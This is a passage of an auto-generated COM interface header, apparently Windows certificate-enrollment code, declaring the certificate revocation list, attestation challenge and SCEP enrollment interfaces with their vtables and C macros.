        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignatureInformation )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509SignatureInformation **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawDataToBeSigned )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Signature )( 
            __RPC__in IX509CertificateRevocationList * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509CertificateRevocationListVtbl;

    interface IX509CertificateRevocationList
    {
        CONST_VTBL struct IX509CertificateRevocationListVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRevocationList_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRevocationList_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRevocationList_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRevocationList_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRevocationList_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRevocationList_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRevocationList_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRevocationList_Initialize(This)	\
    ( (This)->lpVtbl -> Initialize(This) ) 

#define IX509CertificateRevocationList_InitializeDecode(This,strEncodedData,Encoding)	\
    ( (This)->lpVtbl -> InitializeDecode(This,strEncodedData,Encoding) ) 

#define IX509CertificateRevocationList_Encode(This)	\
    ( (This)->lpVtbl -> Encode(This) ) 

#define IX509CertificateRevocationList_ResetForEncode(This)	\
    ( (This)->lpVtbl -> ResetForEncode(This) ) 

#define IX509CertificateRevocationList_CheckPublicKeySignature(This,pPublicKey)	\
    ( (This)->lpVtbl -> CheckPublicKeySignature(This,pPublicKey) ) 

#define IX509CertificateRevocationList_CheckSignature(This)	\
    ( (This)->lpVtbl -> CheckSignature(This) ) 

#define IX509CertificateRevocationList_get_Issuer(This,ppValue)	\
    ( (This)->lpVtbl -> get_Issuer(This,ppValue) ) 

#define IX509CertificateRevocationList_put_Issuer(This,pValue)	\
    ( (This)->lpVtbl -> put_Issuer(This,pValue) ) 

#define IX509CertificateRevocationList_get_ThisUpdate(This,pValue)	\
    ( (This)->lpVtbl -> get_ThisUpdate(This,pValue) ) 

#define IX509CertificateRevocationList_put_ThisUpdate(This,Value)	\
    ( (This)->lpVtbl -> put_ThisUpdate(This,Value) ) 

#define IX509CertificateRevocationList_get_NextUpdate(This,pValue)	\
    ( (This)->lpVtbl -> get_NextUpdate(This,pValue) ) 

#define IX509CertificateRevocationList_put_NextUpdate(This,Value)	\
    ( (This)->lpVtbl -> put_NextUpdate(This,Value) ) 

#define IX509CertificateRevocationList_get_X509CRLEntries(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509CRLEntries(This,ppValue) ) 

#define IX509CertificateRevocationList_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#define IX509CertificateRevocationList_get_CriticalExtensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_CriticalExtensions(This,ppValue) ) 

#define IX509CertificateRevocationList_get_SignerCertificate(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignerCertificate(This,ppValue) ) 

#define IX509CertificateRevocationList_put_SignerCertificate(This,pValue)	\
    ( (This)->lpVtbl -> put_SignerCertificate(This,pValue) ) 

#define IX509CertificateRevocationList_get_CRLNumber(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_CRLNumber(This,Encoding,pValue) ) 

#define IX509CertificateRevocationList_put_CRLNumber(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_CRLNumber(This,Encoding,Value) ) 

#define IX509CertificateRevocationList_get_CAVersion(This,pValue)	\
    ( (This)->lpVtbl -> get_CAVersion(This,pValue) ) 

#define IX509CertificateRevocationList_put_CAVersion(This,pValue)	\
    ( (This)->lpVtbl -> put_CAVersion(This,pValue) ) 

#define IX509CertificateRevocationList_get_BaseCRL(This,pValue)	\
    ( (This)->lpVtbl -> get_BaseCRL(This,pValue) ) 

#define IX509CertificateRevocationList_get_NullSigned(This,pValue)	\
    ( (This)->lpVtbl -> get_NullSigned(This,pValue) ) 

#define IX509CertificateRevocationList_get_HashAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_HashAlgorithm(This,ppValue) ) 

#define IX509CertificateRevocationList_put_HashAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> put_HashAlgorithm(This,pValue) ) 

#define IX509CertificateRevocationList_get_AlternateSignatureAlgorithm(This,pValue)	\
    ( (This)->lpVtbl -> get_AlternateSignatureAlgorithm(This,pValue) ) 

#define IX509CertificateRevocationList_put_AlternateSignatureAlgorithm(This,Value)	\
    ( (This)->lpVtbl -> put_AlternateSignatureAlgorithm(This,Value) ) 

#define IX509CertificateRevocationList_get_SignatureInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_SignatureInformation(This,ppValue) ) 

#define IX509CertificateRevocationList_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509CertificateRevocationList_get_RawDataToBeSigned(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawDataToBeSigned(This,Encoding,pValue) ) 

#define IX509CertificateRevocationList_get_Signature(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_Signature(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateRevocationList_INTERFACE_DEFINED__ */


#ifndef __ICertificateAttestationChallenge_INTERFACE_DEFINED__
#define __ICertificateAttestationChallenge_INTERFACE_DEFINED__

/* interface ICertificateAttestationChallenge */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificateAttestationChallenge;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("6F175A7C-4A3A-40AE-9DBA-592FD6BBF9B8")
    ICertificateAttestationChallenge : public IDispatch
    {
    public:
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPendingFullCmcResponseWithChallenge) = 0;
        
        virtual /* [custom] */ HRESULT STDMETHODCALLTYPE DecryptChallenge( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEnvelopedPkcs7ReencryptedToCA) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_RequestID( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestID) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificateAttestationChallengeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificateAttestationChallenge * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificateAttestationChallenge * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificateAttestationChallenge * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPendingFullCmcResponseWithChallenge);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *DecryptChallenge )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEnvelopedPkcs7ReencryptedToCA);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestID )( 
            __RPC__in ICertificateAttestationChallenge * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestID);
        
        END_INTERFACE
    } ICertificateAttestationChallengeVtbl;

    interface ICertificateAttestationChallenge
    {
        CONST_VTBL struct ICertificateAttestationChallengeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificateAttestationChallenge_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificateAttestationChallenge_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificateAttestationChallenge_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificateAttestationChallenge_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificateAttestationChallenge_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificateAttestationChallenge_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificateAttestationChallenge_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificateAttestationChallenge_Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge) ) 

#define ICertificateAttestationChallenge_DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA)	\
    ( (This)->lpVtbl -> DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA) ) 

#define ICertificateAttestationChallenge_get_RequestID(This,pstrRequestID)	\
    ( (This)->lpVtbl -> get_RequestID(This,pstrRequestID) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificateAttestationChallenge_INTERFACE_DEFINED__ */


#ifndef __ICertificateAttestationChallenge2_INTERFACE_DEFINED__
#define __ICertificateAttestationChallenge2_INTERFACE_DEFINED__

/* interface ICertificateAttestationChallenge2 */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificateAttestationChallenge2;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("4631334d-e266-47d6-bd79-be53cb2e2753")
    ICertificateAttestationChallenge2 : public ICertificateAttestationChallenge
    {
    public:
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyContainerName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_KeyBlob( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertificateAttestationChallenge2Vtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificateAttestationChallenge2 * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificateAttestationChallenge2 * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificateAttestationChallenge2 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strPendingFullCmcResponseWithChallenge);
        
        /* [custom] */ HRESULT ( STDMETHODCALLTYPE *DecryptChallenge )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEnvelopedPkcs7ReencryptedToCA);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_RequestID )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestID);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyContainerName )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_KeyBlob )( 
            __RPC__in ICertificateAttestationChallenge2 * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        END_INTERFACE
    } ICertificateAttestationChallenge2Vtbl;

    interface ICertificateAttestationChallenge2
    {
        CONST_VTBL struct ICertificateAttestationChallenge2Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificateAttestationChallenge2_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificateAttestationChallenge2_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificateAttestationChallenge2_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificateAttestationChallenge2_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificateAttestationChallenge2_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificateAttestationChallenge2_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificateAttestationChallenge2_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificateAttestationChallenge2_Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge)	\
    ( (This)->lpVtbl -> Initialize(This,Encoding,strPendingFullCmcResponseWithChallenge) ) 

#define ICertificateAttestationChallenge2_DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA)	\
    ( (This)->lpVtbl -> DecryptChallenge(This,Encoding,pstrEnvelopedPkcs7ReencryptedToCA) ) 

#define ICertificateAttestationChallenge2_get_RequestID(This,pstrRequestID)	\
    ( (This)->lpVtbl -> get_RequestID(This,pstrRequestID) ) 


#define ICertificateAttestationChallenge2_put_KeyContainerName(This,Value)	\
    ( (This)->lpVtbl -> put_KeyContainerName(This,Value) ) 

#define ICertificateAttestationChallenge2_put_KeyBlob(This,Encoding,Value)	\
    ( (This)->lpVtbl -> put_KeyBlob(This,Encoding,Value) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificateAttestationChallenge2_INTERFACE_DEFINED__ */


#ifndef __IX509SCEPEnrollment_INTERFACE_DEFINED__
#define __IX509SCEPEnrollment_INTERFACE_DEFINED__

/* interface IX509SCEPEnrollment */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509SCEPEnrollment;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab361-217d-11da-b2a4-000e7bbb2b09")
    IX509SCEPEnrollment : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strThumbprint,
            /* [in] */ EncodingType ThumprintEncoding,
            /* [in] */ __RPC__in BSTR strServerCertificates,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeForPending( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreateRequestMessage( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreateRetrievePendingMessage( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE CreateRetrieveCertificateMessage( 
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strIssuer,
            /* [in] */ EncodingType IssuerEncoding,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [defaultvalue][in] */ EncodingType SerialNumberEncoding,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ProcessResponseMessage( 
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ServerCapabilities( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_FailInfo( 
            /* [retval][out] */ __RPC__out X509SCEPFailInfo *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SignerCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SignerCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_OldCertificate( 
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_OldCertificate( 
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_TransactionId( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_TransactionId( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Request( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequestPkcs10 **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CertificateFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CertificateFriendlyName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Status( 
            /* [retval][out] */ __RPC__deref_out_opt IX509EnrollmentStatus **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE DeleteRequest( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509SCEPEnrollmentVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509SCEPEnrollment * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509SCEPEnrollment * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509SCEPEnrollment * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in_opt IX509CertificateRequestPkcs10 *pRequest,
            /* [in] */ __RPC__in BSTR strThumbprint,
            /* [in] */ EncodingType ThumprintEncoding,
            /* [in] */ __RPC__in BSTR strServerCertificates,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeForPending )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRequestMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrievePendingMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *CreateRetrieveCertificateMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ X509CertificateEnrollmentContext Context,
            /* [in] */ __RPC__in BSTR strIssuer,
            /* [in] */ EncodingType IssuerEncoding,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [defaultvalue][in] */ EncodingType SerialNumberEncoding,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ProcessResponseMessage )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in BSTR strResponse,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__out X509SCEPDisposition *pDisposition);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ServerCapabilities )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_FailInfo )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__out X509SCEPFailInfo *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SignerCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt ISignerCertificate **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_OldCertificate )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [in] */ __RPC__in_opt ISignerCertificate *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_TransactionId )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_TransactionId )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Request )( 
            __RPC__in IX509SCEPEnrollment * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequestPkcs10 **ppValue);
